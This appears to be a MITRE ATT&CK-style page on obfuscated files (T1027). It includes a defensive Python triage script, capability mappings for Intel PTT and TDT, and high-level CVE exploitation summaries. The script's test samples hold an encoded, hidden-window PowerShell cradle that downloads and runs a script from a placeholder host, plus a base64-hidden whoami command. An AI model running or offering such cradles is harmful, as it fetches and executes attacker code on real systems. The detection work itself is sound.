Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also abuse Command Obfuscation to obscure commands executed from payloads or directly via Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
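As an added example (not part of the ATT&CK technique text or of any vendor product listed on this page), the following Python triage helpers exercise three signals the description above mentions: byte entropy that separates encrypted or packed content from ordinary data, base64 runs embedded in a script that hide plain-text strings, and PowerShell's `-EncodedCommand` switch decoded from a process command line. All sample inputs are constructed inline; the 7.2 bits/byte threshold and the 40-character minimum run length are assumptions chosen for illustration.

```python
"""Triage heuristics for T1027-style obfuscation in files and command lines.

Added example, not part of the ATT&CK technique text or any vendor product.
All sample inputs are constructed below; thresholds are illustrative assumptions.
"""
import base64
import binascii
import math
import random
import re
from collections import Counter
from typing import Optional

# Assumption: >= 7.2 bits/byte is a common rule of thumb for encrypted or
# packed data; text, scripts and most native code sit well below 6 bits/byte.
HIGH_ENTROPY_BITS = 7.2

# Runs of >= 40 base64 characters (optional padding) that are not glued to
# other base64-alphabet characters; shorter runs produce too many false hits.
B64_RUN = re.compile(rb"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{40,}={0,2})(?![A-Za-z0-9+/])")

# powershell.exe accepts any prefix of -EncodedCommand from -e onward, plus the
# documented alias -ec, with either - or / and in any letter case. The payload
# is base64 of UTF-16LE text, so signatures written for plaintext miss it.
_FLAG = "-encodedcommand"
ENCODED_FLAGS = {_FLAG[:n] for n in range(2, len(_FLAG) + 1)} | {"-ec"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_high_entropy(data: bytes, threshold: float = HIGH_ENTROPY_BITS) -> bool:
    return shannon_entropy(data) >= threshold


def _mostly_printable(data: bytes, ratio: float = 0.9) -> bool:
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return bool(data) and printable / len(data) >= ratio


def find_embedded_base64(data: bytes) -> list:
    """Decode base64 runs that hide plain-text strings inside a file or script."""
    found = []
    for match in B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except binascii.Error:
            continue  # bad length/padding: a long identifier or hex run, not base64
        if _mostly_printable(decoded):
            found.append(decoded.decode("ascii"))
    return found


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, if any."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if flag.startswith("/"):
            flag = "-" + flag[1:]
        if flag in ENCODED_FLAGS:
            blob = tokens[i + 1].strip("'\"")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


# ---- constructed samples (not real malware) -------------------------------
_rng = random.Random(1)
SAMPLE_ENCRYPTED = bytes(_rng.getrandbits(8) for _ in range(4096))  # stand-in for an encrypted payload
SAMPLE_TEXT = b"# ordinary config\nlisten = 0.0.0.0:8443\nlog_level = info\n" * 40

_HIDDEN = b"cmd.exe /c whoami /all > C:\\Users\\Public\\out.txt"
SAMPLE_SCRIPT = b'var p = "' + base64.b64encode(_HIDDEN) + b'";\nrun(atob(p));\n'

_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -ENC " + base64.b64encode(
    _CRADLE.encode("utf-16le")).decode("ascii")


def triage() -> dict:
    """Run every heuristic over the constructed samples."""
    return {
        "encrypted_high_entropy": is_high_entropy(SAMPLE_ENCRYPTED),
        "text_high_entropy": is_high_entropy(SAMPLE_TEXT),
        "script_hidden_strings": find_embedded_base64(SAMPLE_SCRIPT),
        "decoded_command": decode_encoded_command(SAMPLE_CMDLINE),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name}: {result}")
```

Entropy alone is a triage signal, not a verdict: legitimate compressed or signed files (archives, images, many installers) also score high, so pair it with context such as file type, parent process, and whether a decoded string is itself a command. Likewise, decode an encoded command before matching detection rules; signatures written against the plaintext will not fire on the base64 form.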
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
intel-ptt | Intel Platform Trust Technology | Win 11, Secure Boot | T1027 | Obfuscated Files or Information |
Comments
Windows Secure Boot is enforced by the UEFI firmware, which verifies the signatures of firmware drivers, the bootloader, and boot drivers before the operating system loads. Intel PTT, Intel's firmware TPM, complements it by measuring the Secure Boot policy and the components that were loaded into TPM Platform Configuration Registers, so that a later change to those settings or components is detectable (for example, a BitLocker key sealed to the PCRs will no longer unseal). Intel Boot Guard protects the layer beneath both: it verifies the UEFI firmware itself before the processor executes it, so the system does not proceed with tampered firmware.
When the PC starts, the firmware checks the signature of each piece of boot software, including Unified Extensible Firmware Interface (UEFI) firmware drivers (also known as Option ROMs), Extensible Firmware Interface (EFI) applications, and the operating system loader. If the signatures are valid, the PC boots and the firmware hands control to the operating system. Rollback protection additionally prevents the system from being reverted to older firmware versions.
Together these address pre-OS threats that replace or modify a boot component: an unsigned or incorrectly signed component is refused by Secure Boot, and a component altered before boot shows up as an unexpected measurement. On Windows, `Confirm-SecureBootUEFI` and `Get-Tpm` report whether Secure Boot is enforced and whether the TPM is present and ready.
intel-tdt | Intel Threat Detection Technology | Microsoft Defender | T1027 | Obfuscated Files or Information |
Comments
Intel Threat Detection Technology's (Intel TDT) Accelerated Memory Scanning (AMS) offloads memory scanning to the integrated Graphics Processing Unit (integrated GPU) on Intel client SoCs.
Microsoft Defender Antivirus uses AMS to scan process memory for polymorphic and fileless attacks, whose payloads are obfuscated on disk and only appear in the clear once unpacked in memory, while reducing the performance impact on the Central Processing Unit (CPU).
intel-tdt | Intel Threat Detection Technology | CrowdStrike AMS | T1027 | Obfuscated Files or Information |
Comments
Intel Threat Detection Technology's (Intel TDT) Accelerated Memory Scanning (AMS) offloads memory scanning to the integrated Graphics Processing Unit (integrated GPU) on Intel client SoCs.
CrowdStrike Falcon uses this capability as CrowdStrike Accelerated Memory Scanning (CAMS) to scan memory for payloads that are packed, encrypted, or otherwise obfuscated on disk and only appear in the clear once unpacked or decrypted in memory. Scanning memory rather than files lets Falcon detect such Obfuscated Files or Information (T1027) earlier in the kill chain while limiting the performance impact on the host.
Intel TDT also provides real-time telemetry on program execution, memory access, and control flow, which helps surface behaviors such as decoding or unpacking routines and the subsequent execution of the decoded code.
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
CVE-2010-2883 | Adobe Acrobat and Reader Stack-Based Buffer Overflow Vulnerability | primary_impact | T1027 | Obfuscated Files or Information |
Comments
This vulnerability is exploited when a user opens a malicious PDF file, giving the attacker arbitrary code execution.
CVE-2022-24086 | Adobe Commerce and Magento Open Source Improper Input Validation Vulnerability | primary_impact | T1027 | Obfuscated Files or Information |
Comments
This vulnerability can be exploited via a public-facing e-commerce application to achieve remote code execution. To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated.
CVE-2021-40539 | Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
This is an authentication bypass vulnerability that can enable remote code execution. Numerous post-exploitation impacts by threat actors are detailed in the referenced CISA report.
CVE-2021-44077 | Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
CVE-2021-44077 is an unauthenticated remote code execution vulnerability. Observed post-exploitation activity includes: writing web shells to disk for persistence; obfuscating and deobfuscating/decoding files or information; dumping user credentials; using only signed Windows binaries for follow-on actions; adding and deleting user accounts as needed; exfiltrating the Active Directory database; using Windows Management Instrumentation for remote execution; deleting files to remove indicators from the host; discovering domain accounts; collecting and archiving files for exfiltration; and using symmetric encryption for command and control.
CVE-2021-40449 | Microsoft Windows Win32k Privilege Escalation Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
CVE-2021-40449 is a use-after-free in the Win32k driver, specifically in the NtGdiResetDC function, caused by improper handling of user-mode callbacks: calling ResetDC a second time for the same handle from within the callback frees an object that is still in use. Exploitation requires the ability to run code locally on the target. The flaw has been exploited in the wild, primarily in espionage campaigns, to elevate privileges on Windows servers and then deploy additional malware.
Once the vulnerability is triggered, the attacker manipulates memory to perform arbitrary kernel function calls with controlled parameters, which yields kernel memory read and write primitives; these are used to escalate from the compromised user's context to elevated privileges.
Technique ID | Technique Name | Number of Mappings |
---|---|---|
T1027.011 | Fileless Storage | 2 |
T1027.009 | Embedded Payloads | 2 |
T1027.013 | Encrypted/Encoded File | 2 |
T1027.008 | Stripped Payloads | 2 |
T1027.001 | Binary Padding | 2 |
T1027.005 | Indicator Removal from Tools | 2 |
T1027.003 | Steganography | 2 |
T1027.004 | Compile After Delivery | 3 |
T1027.010 | Command Obfuscation | 2 |
T1027.002 | Software Packing | 3 |
T1027.007 | Dynamic API Resolution | 2 |